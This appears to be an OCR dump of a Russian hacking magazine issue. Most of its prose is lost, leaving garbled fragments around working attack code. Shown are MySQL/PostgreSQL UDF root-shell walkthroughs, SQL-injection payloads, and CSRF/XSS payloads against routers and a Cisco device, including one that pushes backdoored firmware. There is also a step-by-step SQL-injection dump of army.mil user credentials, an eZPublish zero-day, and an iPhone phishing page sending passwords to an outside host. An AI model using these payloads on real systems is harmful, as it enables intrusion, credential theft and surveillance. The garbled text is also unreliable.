autorun.inf, : UseAutoPlay=1. X:\Dump.
Ipod, aliveintheory.110mb.
com/IPODSWITCHBLADE.zip. : , Ipoda
.exe-. . hak5,
. ,
progstart.bat. !
X:\iPod_Config\Dump.


: wiki.hak5.
org/wiki/USB_Switchblade#Max_Damage_Technique.
,
Silivrenions Technique. XP SP 2, ,
( Windows
Wireless Zero Configuration, netcat ..). , ExeScript (hide-folder.com/overview/hf_7.html),

(.bat, .vbs .js, WSF, WSH, HTA) .
!

. ,


:
(, ..)
:
LFI, , - . ,
FreeBSD, , .
(CentOS, Linux),
? , ( , passwd)
.
, DVD:
import sys, httplib, urllib2, socket, time, re
# , , /etc/passwd
Search = "root:"
#Verbose Mode On = 1
Verbose = 0
#
vulns = "http://packetstormsecurity.org/fuzzer/dirTraversal.txt"
#
TTW = "2"
def main(host, path):
h = httplib.HTTP(host)
h.putrequest("HEAD", path)
h.putheader("Host", host)
h.endheaders()
okresp, reason, headers = h.getreply()

:
,
. , NMAP
. ?
? : (
TCP OPTIONS, ,
), .
.
. telnet-:
1. telnetrecon (computec.
ch/projekte/telnetrecon), telnet- (TCP
23) .
2. , , ASCII-:

return okresp, reason, headers.get("Server")


def getsource(line):
    try:
        source = urllib2.urlopen("http://"+line).read()
        if Verbose == 1:
            print "Source:", len(source)
        if re.search(Search.lower(), source.lower()) != None:
            print "\n[!] LFI:", line, "\n"
    except (urllib2.HTTPError, urllib2.URLError), msg:
        print "[-] Received Error:", msg
socket.setdefaulttimeout(10)
...
print "\n[+] Host:",host
print "[+] File:",x
print "[+] Search:",Search
print "[+] Time to wait:", TTW, "seconds"
print "[+] Server:", server
print "[+] Response:", okresp, reason
print "[+] Paths Loaded:",len(paths)
if Verbose == 1:
print "[+] Verbose Mode On\n"
else:
print "[+] Verbose Mode Off\n"

"253" DO [0xdf]
"37" Authentication option (RFC 2941)
"255" IAC-byte
"251" WILL [0xfb] z

TelnetRecon

255-253-37-255-251-255-251-255-253-92-39-255-253-255-253-255-251

Windows XP.
3. Telnet RFC 854.
:
"255" IAC-byte

SKVOZ

01

://

MOZILLA
FIREFOX (CLICKJACKING)

>> Brief
.
Clickjacking,
. (
),

-. , , clickjacking. ,
, :
Adobe Flash Player, Internet Explorer, Opera, Safari Firefox. , - ,
:
! Firefox
NoScript JS-

function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}

onclick=updatebox(event), .
, , Google Chrome.

>> Targets:
Google Chrome 1.0.154.43/Mozilla Firefox 3.0.5/IE 7.0
>> Exploit
http://seclists.org/bugtraq/2009/Jan/0268.html
>> Solution
Firefox ,
. - , Noscript. IE 8
XSSFilter, NoScript .
Opera .
iframe, .
. inline-. opera:config,
IFrames ( ).

02
XSSFilter IE 8


FULL-DISCLOSURE
MYSQL UDF-

>> Brief
.

.
.
MySQL User-Defined (UDF)
,
. .
raptor_udf2.c (0xdeadbeef.info/exploits/raptor_udf2.c).
, : -
.

(dynamic-link library Windows) shared object (Unix/Linux-like)
load_file , , SQL-injection.
:
$ id
uid=500(raptor) gid=500(raptor) groups=500(raptor)
#
$ gcc -g -c raptor_udf.c
$ gcc -g -shared -Wl,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc
# ,
.so
$ mysql -u root -p
Enter password:
[...]
# - , ,
mysql:
mysql> use mysql;
# blob
mysql> create table foo(line blob);
#
mysql> insert into foo values(load_file('/home/raptor/raptor_udf.so'));
# malicious-
mysql> select * from foo into dumpfile '/usr/lib/raptor_udf.so';
mysql> create function do_system returns integer soname
'raptor_udf.so';
mysql> select * from mysql.func;
+-----------+-----+---------------+----------+
| name      | ret | dl            | type     |
+-----------+-----+---------------+----------+
| do_system |   2 | raptor_udf.so | function |
+-----------+-----+---------------+----------+
mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
mysql> \! sh
#
sh-2.05b$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)

, MySQL
5.x. ,
sys_eval, sys_exec. 1 0. ,

lib_mysqludf_sys, sys_exec sys_eval.
$ wget --no-check-certificate https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz
$ tar xfz lib_mysqludf_sys_0.0.3.tar.gz
$ cd lib_mysqludf_sys_0.0.3
$ sudo ./install.sh
#
gcc -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o /usr/lib/lib_mysqludf_sys.so
MySQL UDF compiled successfully
$ mysql -u root -p mysql
Enter password:
[...]
mysql> SELECT sys_eval('id');
+--------------------------------------------------+
| sys_eval('id') |
+--------------------------------------------------+
| uid=118(mysql) gid=128(mysql) groups=128(mysql) |
+--------------------------------------------------+
1 row in set (0.02 sec)
# - ,
mysql> SELECT sys_exec('touch /tmp/test_mysql');
+-----------------------------------+
| sys_exec('touch /tmp/test_mysql') |
+-----------------------------------+
|                                 0 |
+-----------------------------------+
1 row in set (0.02 sec)
mysql> exit
Bye
$ ls -l /tmp/test_mysql
-rw-rw---- 1 mysql mysql 0 2009-01-16 23:18 /tmp/test_mysql

>> Targets
MySQL 5.0+
>> Exploit

SQL-injection svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/
mysqludfsys/.
raptor


MySQL
. ,
(mysqludf.org).
( ),
lib_mysqludf_sys (mysqludf.org/lib_mysqludf_sys/index.php), :
sys_exec ex
sys_get
sys_set ,


AppArmor . WEB

>> Solution
, .
,
, AppArmor. , AppArmor
WEB-application . , , (DAC) (MAC). ,
. AppArmor:
sudo apparmor_status
[...]
1 processes have profiles defined.
0 processes are in enforce mode :
0 processes are in complain mode.
1 processes are unconfined but have a profile defined.
/usr/sbin/mysqld (5128)
$ mysql -u root -p mysql
Enter password:
[...]
mysql> SELECT sys_eval('id');
+----------------+
| sys_eval('id') |
+----------------+
|                |
+----------------+
1 row in set (0.12 sec)

!
mysql> select sys_exec('id');
+----------------+
| sys_exec('id') |
+----------------+
| 32512 |
+----------------+
1 row in set (0.01 sec)
mysql> exit
Bye
# AppArmor:
$ sudo /etc/init.d/apparmor stop
Unloading AppArmor profiles : done.
$ sudo apparmor_status
[...]
0 processes have profiles defined.
0 processes are in enforce mode :
0 processes are in complain mode.


0 processes are unconfined but have a profile defined.
$ mysql -u root -p mysql
Enter password:
[...]
mysql> select sys_eval('id');
+--------------------------------------------------+
| sys_eval('id') |
+--------------------------------------------------+
| uid=118(mysql) gid=128(mysql) groups=128(mysql) |
+--------------------------------------------------+
1 row in set (0.02 sec)
mysql> select sys_exec('id');
+----------------+
| sys_exec('id') |
+----------------+
|              0 |
+----------------+
1 row in set (0.10 sec)

03

POSTGRESQL UDF

>> Brief
UDF .
UDF
- ( , ,
, ). PostgreSQL .
libc system(). ,
pgshell (leidecker.info/projects/pgshell.
shtml).
? SQL-injection:
/store.php?id=1; <Injection>

PostgreSQL 8.1 UDF . , :


CREATE FUNCTION system(cstring) RETURNS int AS '/lib/
libc.so.6', 'system' LANGUAGE 'C' STRICT.

, system() INT-,

HTTP

stdout-.
:
# ,
/store.php?id=1; CREATE TABLE stdout(id serial, system_
out text)
#
/store.php?id=1; CREATE FUNCTION system(cstring)
RETURNS int AS /lib/libc.so.6','system' LANGUAGE 'C'
STRICT -# -

/store.php?id=1; SELECT system('uname -a > /tmp/test')
# ,
system_out
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/
test'
#
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout
FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--

Procedural Language
Function (PL/tcl, PL/pl, PL/python). , PostgreSQL

.
# , PL/Python
/store.php?id=1; SELECT count(*) FROM pg_language WHERE
lanname=plpythonu
# ,
/store.php?id=1; CREATE LANGUAGE plpythonu
# , ,
Python
/store.php?id=1; CREATE FUNCTION proxyshell(text)
RETURNS text AS import os; return os.popen(args[0]).
read() LANGUAGE plpythonu
#
/store.php?id=1 UNION ALL SELECT NULL,
proxyshell(whoami), NULL OFFSET 1;--

PL/Perl:
# PL/Perl
SELECT count(*) FROM pg_language WHERE lanname=plperlu

# CREATE FUNCTION
proxyshell(text) RETURNS text AS 'open(FD,"$_[0]
|");return join("",<FD>);' LANGUAGE plperlu
#
SELECT proxyshell(os command);

>> Targets
PostgreSQL 8.2/8.3/8.4
>> Exploits
http://milw0rm.com/sploits/2009-lib_postgresqludf_
sys_0.0.1.tar.gz
>> Solution
MySQL.

04

PGP DESKTOP 9.0.6 LOCAL DENIAL OF SERVICE

>> Brief:

,
-, .
PGP
PGPwded.sys,
. ,
IOCTL (0x80022038):
Device Type: Custom Device Type: 0x8002, 32770
Transfer Type: METHOD_BUFFERED (0x0, 0)
Access Type: FILE_ANY_ACCESS (0x0, 0)
Function Code: 0x80E, 2062

, IOCTL /. ,
ioctl
( ,
, ).
command arg ,
,
. , -



Google Dork GHDB
AXIS 70U Network Document Server

KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e), ,
.
. , ,
,
.
: IOCTL-proxy
(orange-bat.com/code/ioctl-proxy.zip), kartoffel (kartoffel.reversemode.
com/downloads.php).

>> Targets
PGP Desktop 9.0.6 [Build 6060]
>> Exploits
http://www.evilfingers.com/
advisory/PGPDesktop_9_0_6_Denial_Of_Service_POC.php.
>> Solution
.

05

, , ,
, (WEB-;
, ). , :
: AXIS
AXIS 70U Network Document Server
: XSS +
:
XSS:
http://[server]/user/help/help.shtml?<script>alert(
'XSS')</script>
http://[server]/user/help/general_help_user.shtml?<
script>alert('XSS')</script>

(user/help/help.shtml), :
http://[server]/user/help/help.shtml?/admin/this_
server/this_server.shtml

: Profense
Profense Web Application Firewall
: XSRF / XSS
:
,
OWASP .
, , WEB-, !
SSH/SNMP:


<img src=https://10.1.1.199:2000/ajax.
html?hostname=profense.mydomain.com&gateway=
10.1.1.1&dns=10.1.1.1&smtp=10.1.1.1&max_src_
conn=100&max_src_conn_rate_num=100&max_src_conn_
rate_sec=10&blacklist_exp=3600&ntp=ntp.hacked.
com&timezone=CET&syslog=syslog.hacked.com&syslog_
ext_l=4&snmp_public=public&snmp_location=&contact=
admin%40mydomain.com&ftp_server=ftp.hacked.com&ftp_
port=21&ftp_login=user&ftp_passwd=password&ftp_
remote_dir=%2Fhijacked_log&scp_server=scp.hacked.
com&scp_port=22&scp_login=admin&scp_remote_
dir=%2Fhijacked_log&ftp_auto_on=on&scp_auto_
on=on&ssh_on=on&remote_support_on=on&action=configur
ation&do=save>
Apply new configurations:
<img src=https://10.1.1.199:2000/ajax.html?action=res
tart&do=core>

proxy:
<img src=https://10.1.1.199:2000/ajax.
html?vhost_proto=http&vhost=vhost.com&vhost_
port=80&rhost_proto=http&rhost=10.1.1.1&rho
st_port=80&mode_pass=on&xmle=on&enable_file_
upload=on&static_passthrough=on&action=add&do=save>

( ):
<img src=https://10.1.1.199:2000/ajax.
html?action=shutdown>

XSS:
https://10.1.1.199:2000/proxy.html?action=manage&ma
in=log&show=deny_log&proxy=><script>alert(document.
cookie)</script>

: DLINK
D-link VoIP Phone Adapter
: + XSS
:
CSRF- :
<html>
<form action="http://10.1.1.166/Forms/cbi_Set_SW_Upda
te?16640,0,0,0,0,0,0,0,0" method="POST">
<input name="page_HiddenVar" value="0">
<input name="TFTPServerAddress1" value="10">
<input name="TFTPServerAddress2" value="1">
<input name="TFTPServerAddress3" value="1">
<input name="TFTPServerAddress4" value="1">
<input name="FirmwareUpdate"
value="enabled">
<input name="FileName" value="backdoored_firmware.
img">
<input type=submit value="attack">
</form>
</html>

.
XSS:
http://10.1.1.166/Forms/page_CfgDevInfo_Set?%3Cscri
pt%3Ealert(%22hacked%22)%3C/script%3E

: 3COM
3Com OfficeConnect Wireless Cable/DSL Router
:
:
,
. - .

CGI-. , (System Tools
Configuration Backup Configuration). , , ,
, (config.bin).
, , , ,
wifi-, snmp- .
http://<IP>/SaveCfgFile.cgi

config.bin:
pppoe_username=xxxxxxxxxxxxxxx
pppoe_password=xxxxxxxxx
pppoe_service_name=xxxxxxxxx
[...]
mradius_username=xxxxxx
mradius_password=xxxxxx
mradius_secret=xxxxxxx
[...]

Remote
Administration:
http://www.securityfocus.com/archive/1/500762/30/0/threaded.
: CISCO
CISCO IOS
: XSRF/XSS
:
HTTP-:
furchtbar#show ip http server status | include status
HTTP server status: Enabled
HTTP secure server status: Enabled
furchtbar#sh ip int br | i up
FastEthernet0/0 192.168.1.2 YES NVRAM up up

XSS:
http://192.168.1.2/level/15/exec/-/"><body
onload=alert("bug")>
http://192.168.1.2/level/15/exec/-/"><iframe onload = alert
("bug")>
http://192.168.1.2/exec/"><body onload="alert('bug');">

CSRF ( ):

http://192.168.1.2/level/15/exec/-/"><body onload=window.
location ='http://192.168.1.2/level/15/configure/-/hostname
/BUGGY/CR'>

:
Digital Security Research Group [DSecRG],
BinaryVision, Luca Carettoni (luca.carettoni[at]ikkisoft[dot]com). z
SKVOZ

ARMY.MIL

WEB-
. , .
?
. .
z
Army.mil.
, Zone-h.
org,
.
( ), ( , ),
( ).
, ,
katharsis
( US Army HACK katharsis.
bplaced.net/armyhack.htm). (cpma.apg.army.mil, 2rotc.
army.mil) 2000 Crime boys.
, ,
soa.mdw.army.mil, mdw.army.mil, mdwweb.
mdw.army.mil spiritofamerica.mdw.army.mil.
, .

!
.
:
http://www4.army.mil/otf/story.php?id=1
http://www4.army.mil/otf/story.php?id=-31337

, SQL-injection


Web Application Security Consortium.


,
:
import os, sys, httplib
#
p = 'http://www4.army.mil/otf/story.php?id=1+AND+1=2+U
NION+SELECT+'
def find(host, p):
try: # 0,1,2,3,4
for i in range(50):
colls = p+str(i)+','
#
h = httplib.HTTP(host)
h.putrequest('GET', colls)
h.putheader('Accept', 'text/html')
h.putheader('Accept', 'text/plain)
h.endheaders()
errcode, errmsg, headers = h.getreply()
if errcode==200:
print cools
except:
pass
find(p)

:

SQL-injection

http://www4.army.mil/otf/story.php?id=1+AND+
1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,1
2,13,14,15--

, SELECT.
, . ,
.
:

, , :
http://www4.army.mil/otf/story.php?id=1+AND+
1=2+UNION+SELECT+0,1,concat(user(),0x20,data
base(),0x20,version()),3,4,5,6,7,8,9,10,11,
12,13,14,15--

:
: otf_web_user@localhost
: otf
: 4.1.22-log


dvd

700


.

!

: http://www4.army.mil/otf/admin/Login/login.php.
, ,
. ,
OTF (www4.army.mil/otf).
-, CMS
,
. , .
. MySQL 4.* . (information_schema)
5.*,
, users:


,
,
ARNEWS ( ).
, :
http://www4.army.mil/ocpa/read.php?story_id_
key=5061

:
http://www4.army.mil/otf/story.php?id=1+AND+
1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,1
2,13,14,15+FROM+users ()

.
:
http://www4.army.mil/otf/story.php?id=1+AN
D+1=2+UNION+SELECT+0,1,count(user_username)
,3,4,5,6,7,8,9,10,11,12,13,14,15+FROM+users
(, 5 )
http://www4.army.mil/otf/story.php?id=
1+AND+1=2+UNION+SELECT+0,1,concat(user_
username,0x20,user_pw,0x20,user_email),3,4,
5,6,7,8,9,10,11,12,13,14,15+FROM+users+LIMI
T+1,2

http://www4.army.mil/otf/speech.php?story_
id_key=9859+AND+1=2+UNION+SELECT+0,1,2,3,conca
t(database(),0x20,%20user()),5,6,7,8,9,10,11- http://www4.army.mil/otf/speech.php?story_
id_key=9859+AND+1=2+UNION+SELECT+0,1,2,3,con
cat(user_username,0x20,user_pw,0x20,user_ema
il),5,6,7,8,9,10,11+FROM+users

, :
database: ocpa
user: OCPAuserbasic@localhost

:
, LIMIT

, .
,

! ,
system_all. ,


, ,
(junior) (system_all)


. ,
().
: $H = L \log_2 N = L \frac{\log N}{\log 2}$, L , N .
, ottomotto, L=9, N=26 (
). , , , 4.9 ,
. , N=94 (
ASCII) 6.55.
, :

.
. .
,
, 19 . : http://www4.army.mil/ocpa/admin.
, . ,


OTF. LIMIT
CMS
ARNEWS
- , .


,
SQL-injection
. - , .
. ,
HEAD- .
,
. , robots.txt ( ,
, ). sqlite,
.
import os, sys, sqlite3, httplib, re, locale
# -*- coding: utf-8 -*import thread, sqlite3
# ,
dires = []
#
HEAD
def check(host, p):
try:
h = httplib.HTTP(host)
h.putrequest('HEAD', p)
h.putheader('Host', host)
h.putheader('Accept', 'text/html')
h.putheader('Accept', 'text/plain')
h.endheaders()
errcode, errmsg, headers = h.getreply()
if (errcode==200) and (len(headers)!=0):
dires.append(p)
except:
pass
# robots.txt,
, , :
def robots(host):
global dires
try:
f = urllib.urlopen('http://'+host+'/robots.txt)
line = f.read()
txt = re.findall('Disallow: (.*)$', str(line),
re.MULTILINE)
for i in txt:
if i=='/' or i=='/\r':
pass
else:
dires.append(i)
except IOError:
pass
# ,

def dirs(host):
global dires
conn = sqlite3.connect('db')
c = conn.cursor()
c.execute('SELECT * FROM Directories')
for row in c:
thread.start_new_thread(check,(host, row[1]))
thread.start_new_thread(robots, (host,))
# python-:

list(set(dires))
#
locale.setlocale(locale.LC_ALL, '')
tmp = [x.swapcase() for x in list(set(dires))]
tmp.sort(key=locale.strxfrm)
tmp = [x.swapcase() for x in tmp]
return tmp
dirs('army.mil')

, OWASP
Dirbuster ( ettee). , JAVA.
( , WEB-). owasp.org/index.php/Category:
OWASP_DirBuster_Project. : java
-jar DirBuster-0.12.jar -H -u https://127.0.0.1/ ( )
java -jar DirBuster-0.12.jar -u https://127.0.0.1/ (GUI).
? ,
200 , , ,
,
.
, , , , .
(
1273819 ).


,
, . ,
,
.
. z

S4AVRD0W
/ S4AVRD0W@P0C.RU /


CMS EZ PUBLISH
CMS

, web- . ,
.
, .

. ,

.
mod_rewrite, server-side .
, SQL-
. .
, HTML-
: content="eZ publish".
, , , Open source
CMS eZPublish. . /ezinfo/about, CMS .
eZPublish 3.9.3.
CMS
( ).
eZPublish, , , (privilege escalation). . ,
, ,
, .
.


, CMS, , , white-box. All-In-One ,


Next.
.
.


, ,
- .
, , ,
.
.
, web-shell, CMS ( PHP).
.
, , , .
.htaccess
web-, :


info

CMS

...
<FilesMatch ".">
order allow,deny
deny from all
</FilesMatch>
<FilesMatch "(index\.php|\.(gif|jpe?g|png|css|js|html)|var(.+)storage.pdf(.+)\.pdf)$">
order allow,deny
allow from all
</FilesMatch>
RewriteEngine On
RewriteRule !\.(gif|jpe?g|png|css|js|html)|var(.+)storage.pdf(.+)\.pdf$ index.php
...

-
web- .
. -,


, . -,
web-shell ( ).

. CMS, ,
web-.
- : ,
.
eZPublish
advisory, . ,
,
. , .
, .
OWASP WebScarab (, !) ,
.

,
/user/success, ,

e-mail. ! SMTP ,
. ,
, ,
.

WebScarab, ,
. ,


web-
white-box


.
mktime()

Unix,
,


/
Unix
(The Unix Epoch, 1
1970 ).

warning

! ,


!


ZERO-DAY
,
. :
...
if( $type == EZ_USER_PASSWORD_HASH_MD5_USER )
{
$str = md5( "$user\n$password" );
}
...

, .
, ,
UserId, ezuser .
,
CMS. , .
, , , :
. ,
? ! , ,

.
SMTP- CMS POST-

. ,
.
, CMS
.
. ,
, ,
, .
, , target-
( ). ,
.
CMS.


, .
, ,
.
, ,
, (
). , , InsidePro Password Pro

.
, , :
...
// Create enable account hash and send it to the newly registered user
$hash = md5( mktime( ) . $user->attribute( 'contentobject_id' ) );
...

, mktime( ) , web-.
contentobject_id ,
. , eZPublish,
.
HTTP, , .
,
CMS .
, eZPublish .


, , eZPublish PHP? , CMS

eZPublish

dvd

poc-
,
.

. , : .
, , . , PHP-
CMS. . eZPublish,
.
eZPublish,

.
ezpkg. zip,

ezpkg. , ,
( , PHP),
package.xml.
eZPublish,
web- CMS , - ,
. ,
.htaccess, FilesMatch RewriteEngine. ,

apache AllowOverride None, FilesMatch


.htaccess .

xml, . (Path traversal),
package.xml. ,
web- , ,
ezinfo.php.
, ,
. web-. apache,

, ,
web-.

.

SQL-, File-
web. ,
. . ! z

D0ZNP
/ HTTP://OXOD.RU /

APPLE IPHONE

. Apple Apple iPhone. , , !


, .
Unix based, darwin kernel! .

IPHONE 3G: , !
, Apple
iPhone 3g. : GSM- 3g, A-GPS
. ,
, . ,
. , - ( 2.2).
SDK, - Apple Store.
,


. ,
.
iPhone
WinPWN.

Installer ( 4- ) Cydia ( Debian package).
, ,
Apple Store. Installer Cydia ,
.

SQL-injection

iframe src

0. SSHD DEFAULT
. , :
iPhone SSH-, , . , , iPhone
tunnel, USB network. SSHD, ( ). /etc/master.
passwd:

##
# User Database
#
# This file is the authoritative user database.
##
nobody:*:-2:-2::0:0:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0::0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501::0:0:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1::0:0:System Services:/var/root:/usr/bin/false
_securityd:*:64:64::0:0:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65::0:0:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75::0:0:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99::0:0:Unknown User:/var/empty:/usr/bin/false

. , :)
alpine. ,
-, iPhone
22 : mobile/alpine root/alpine. ? ,
, . ,
. : ,
(
). ,
iPhone 3g , 22
.

1. INSTALLER REPOSITORY SPOOFING

,
Installer RipDev. ,
- (,
httpd busybox).
DNS- IP- - ( busy box). iPhone-,
(
- Godlen_Wifi :))
, . xml- zip- . ,
. , !
:

http://i.ripdev.com/seed/repo-r1050.zip

, -

- date version ,
. xml-
url:

. ,
Installer. http://i.ripdev.com/
info/index-2.2.plist, , , :
<dict>
<key>category</key>
<string>System</string>
<key>date</key>
<string>1232132864</string>
<key>identifier</key>
<string>com.ripdev.install</string>
<key>name</key>
<string>Installer</string>
<key>version</key>
<string>4.0</string>
<key>description</key>
<string>THE Installer. Now with resumeable downloads,
optimized and tested for 2.1 and 2.2, rebuilds installed
apps on the fly, supports proxies, Lua scripting language
and more!
Final release. Includes English, Russian and Ukranian
localizations.
</string>
<key>icon</key>
<string>http://i.ripdev.com/info/icons/com.ripdev.
install-4.0.png</string>
<key>url</key>
<string>http://i.ripdev.com/info/com.ripdev.install4.0-2.2.plist</string>
</dict>

, -


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>identifier</key>
<string>com.ripdev.install</string>
<key>name</key>
<string>Installer</string>
<key>version</key>
<string>4.0</string>
<key>description</key>
<string>THE Installer. Now with resumeable downloads,
optimized and tested for 2.1 and 2.2, rebuilds installed
apps on the fly, supports proxies, Lua scripting language
and more!
Final release. Includes English, Russian and Ukranian
localizations.
</string>
<key>icon</key>
<string>http://i.ripdev.com/info/icons/com.ripdev.
install-4.0.png</string>
<key>size</key>
<integer>565635</integer>
<key>hash</key>
<string>3d916b3d60c5c31c66e652f2c5711832</string>
<key>location</key>
<string>http://i.ripdev.com/packages/System/installer40.zip</string>
</dict>
</plist>

version ,
. size,
. hash.
regenerate.php:
$r['hash'] = md5_file($fullpath);

, , . - . , url- . , .
, iPhone , .

2. EXPLOITS
- Safari .
MacOs. .
libtiff,
. javascript-. , :
WebKit , iPhone ,
.
iPhone. -,
. -, . :
http://www.iphoneworld.ca/exploits/crash-my-iphone.
html
, , , ,
, html-
iPhone. , html-:
<a href=http://google.ru>http://yandex.ru</a>

, . http://yandex.ru, ,
, http://google.ru. , e-mail
, : http://yandex.
ru,
. .
, . ,
<a href="%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%72
%75">http://yandex.ru</a>

,
. http://:
<a
href="http://%67%6F%6F%67%6C%65%2E%72%75">http://
yandex.ru</a>

AppleStore

http://www.iphoneworld.ca/exploits/iphone-crash.html

( ) 2.2.
-.
(http://blog.metasploit.com/2007/09/root-shell-in-my-pocket-and-maybe-yours.html), ( , )
- iPhone. , H.D.Moore,
, .
, 25 2007 !
( ) .
,
Safari. - : ;).

3. PHISHING/XSS
, ,
: iPhone,
XSS. , , . , .
,
iPhone,
.
, ,
- .
, , .

,
. ,
. ,
title alt. ,
, AppleStore ( , , )
iframe . ,
HTML-. Safari
, , ,
. , :
<?php
$fish='
<html>
<body bgcolor="white">
<form method="GET" action="http://creditmne.ru/x/f/
i.php" name="fakeform" id="fakeform" width="278">
<tableborder="0"style="width:278px;height:175px;paddin
g-top:0px;padding-right:0px;padding-left:0px;paddingbottom:0px" width="278" height="175" cellpadding="0"
cellspacing="0">
<tr width="278">
<td colspan="4">
<img src="r11.gif" width="278" height="78"/>
</td>
</tr>
<tr width="278">
<td width="8" colspan="1">
<img src="r21.gif" border="0" width="8" height="30"/>
</td>
<td colspan="2" width="0">
<input type="password" style="width:262;height:30"
name="fpass" value="">
</td>
<td width="8" colspan="1">
<img src="r23.gif" style="margin-left:-115px"
border="0" width="8" height="30"/>
</td>
</tr>
<tr >


info


AppleStore
javascript:
prompt('user@
yahoo.com').

,

iTunes ,

javascript.

DNS-.

links
http://www.skyhookwireless.com

MAC-

.
http://blog.metasploit.com/2007/09/root-shell-in-my-pocket-and-maybe-yours.html MetaSploit
Framework
iPhone.

warning
!

! ,

!


<td colspan="2" >


<input type="image" border="0" src="r31.
gif" width="139" height="66"/>
</td>
<td colspan="2" >
<input type="image" border="0" src="r32.
gif"width="139" height="66"/>
</td>
</td>
</table>
</form>
</body>
</html>';
$pass = $_GET["fpass"];
if (strlen($pass)!=0) echo "<h1>password
sniffed: ".$_GET["fpass"]."</h1>";
else echo $fish;
?>

. .
-, . , x y,
, -
. POST . , .
, javascript.
! . , .
iframe. , :

AppleStore.
10 !

<iframe src="http://ya.ru" />

.
, javascript
.
:
<?php
setcookie("user", "test", time()+3600);
foreach ($_COOKIE as $cookie_name => $cookie_value) {
    print("<li>" . htmlspecialchars($cookie_name) . "=" . htmlspecialchars($cookie_value) . "</li>");
}
print("<h2>server array: ");
$tmp=fopen("iphone-mail.txt","w");
foreach($_SERVER as $key_name => $key_value) {
    fputs($tmp, $key_name . " = " . $key_value . "\n");
    print( $key_name . " = " . $key_value . "<br>");
}
fclose($tmp);
print("</h2>");
?>

cookies , - Safari:
HTTP_USER_AGENT = Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2 like Mac OS X; ru-ru) AppleWebKit/525.18.1 (KHTML, like Gecko)
HTTP_ACCEPT = text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
HTTP_ACCEPT_LANGUAGE = ru
HTTP_ACCEPT_ENCODING = gzip, deflate
HTTP_CONNECTION = keep-alive
SERVER_ADMIN = [no address given]
REMOTE_PORT = 6084
SERVER_PROTOCOL = HTTP/1.1
REQUEST_METHOD = GET
QUERY_STRING =
argv = Array
argc = 0

, , ,
<iframe src=/>

iframe
. - width height
. , .
, .
, src= (,
src="blablabla")
. ( ) 3-4 . ,
, .
, . html- iframe, :
<?php
header('Content-type: application/vnd.ms-excel');
header('Content-Disposition: attachment; filename="downloaded.xls"');
readfile('xls.xls');
?>

/ (timer_outgoing/timer_incoming).
/private/var/mobile/Library/Notes/notes.db
. note_bodies: note_id ( )|data ( html , UTF-8).

, PDF/DOC/XLS . !
. , , :

Note:

ROWID ( -

)|creation_date ( )|title
)|summary

)|contains_cjk (?).

/private/var/mobile/Library/SMS/sms.db
:). message: ROWID|address (

)|date|text

UTF-

8)|flags|replace|svc_center|group_id ( ,

<meta http-equiv="Refresh" content="1;


url=http://ya.ru">

)|association_id|height|UIFlags|version.

msg_group: ROWID|type
url , ( ). ,
. ,
- .

4. LOCATION SPOOFING
...
, , .
, . ,
iPhone/iPod
. :
www.syssec.ch/press/location-spoofing-attacks-on-the-iphoneand-ipod. ,
:). : Apple
iPhone 2g Apple iPod touch , GSM-
WiFi-. WiFi-
http://www.skyhookwireless.com (,
).
iPod touch GSM-
, WiFi- . , , ,
( )
( ), .
, -, , . iPhone
2g, , ,
GSM. ,
, ,
. , iPhone
, GSM.

dvd


AppleStore
.


.

(, 0)|newest_

message (ID )|unread_count (- ).


. group_member: ROWID|group_
id|address ( ). .
, , .
,

.
/private/var/mobile/Library/WebKit/Databases/Databases.db , WebKit. . Databases: guid|origin
(, gmail http_mail.google.com_0)|name ( GmailMobileWeb)|displayName|estimatedSize ( )|path ( ).
. /private/var/mobile/Library/WebKit/Databases/<origin Databases.Databases>/<path Databases.Databases>.
.
/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb /private/var/mobile/Library/AddressBook/AddressBookImages.sqlitedb
( ).
ABPerson. : ROWID|First ()|Last ()|Middle ()|FirstPhonetic|MiddlePhonetic|LastPhonetic ( )|Organization|Department|Note|Kind|Birthday|JobTitle|Nickname|Prefix|Suffix|FirstSort|LastSort|CreationDate|ModificationDate|CompositeNameFallback|ExternalIdentifier|StoreID|DisplayName|FirstSortSection|LastSortSection|FirstSortLanguageIndex|LastSortLanguageIndex.

. ?
, :
. ,
, ? . iPhone sqlite.
(, -, ,
) ,
. :
/private/var/mobile/Library/CallHistory/call_history.db . call:
ROWID ( )|address ( )|date (
)|duration (
)|flags ( , )|id ( ?). _SqliteDatabaseProperties -

, ,

,
.
. , .

. .
: unix- !

. Apple iPhone
. , ,
, . , : http://
oxod.ru. z


>>
D0ZNP
/ HTTP://OXOD.RU /

WEP
, WEPLAB AIRCRACK

. , , . WPA ... , WEP! ,


? .
,
? WEP-
weplab aircrack.
,
, .
UNIX-. . Debian,
, . , aircrack Windows, weplab
Cygwin. ,
. ? ,
. , , ,
.
.
